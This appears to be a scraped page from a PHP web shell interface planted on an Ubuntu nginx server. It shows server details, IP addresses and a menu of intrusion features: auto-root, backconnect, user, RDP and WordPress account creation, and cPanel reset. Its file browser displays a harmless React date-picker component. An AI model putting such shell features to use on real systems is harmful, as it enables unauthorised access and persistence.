Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-core-ui-code /
app /
ui /
form /
[ HOME SHELL ]
Name
Size
Permission
Action
Calendar.tsx
1.53
KB
-rw-rw-r--
ReactSelect.tsx
1.63
KB
-rw-rw-r--
index.ts
59
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Calendar.tsx
import React = require('react'); import DatePicker, { ReactDatePickerProps } from 'react-datepicker'; import { BiCalendar } from 'react-icons/bi'; interface Props { containerclassname?: string; label?: string; showIcon?: boolean; containerstyle?: React.CSSProperties; } const handleDateChangeRaw = (e: any) => { e.preventDefault(); }; const Calendar = (props: Props & ReactDatePickerProps) => { const { containerclassname, label, showIcon, containerstyle } = props; return ( <div className="d-inline-flex flex-column pb-3"> {label && ( <label className="text-capitalize font-weight-bold">{label}</label> )} <div style={containerstyle} className={containerclassname ?? 'input-group calender-wrap'} > {/* <div style={{ whiteSpace: "nowrap", display: "flex", alignItems: "center", color: "#D52933", fontWeight: "bold", marginLeft: "10px" }} >As on</div> */} <DatePicker className="form-control rounded-0" autoComplete="off" onChangeRaw={handleDateChangeRaw} {...props} /> <div className="input-group-append"> <div className="bg-primary rounded-0 text-white border-primary input-group-text"> {' '} {showIcon && <BiCalendar className="text-white" />} </div> </div> </div> </div> ); }; Calendar.defaultProps = { showIcon: true, }; export { Calendar };
Close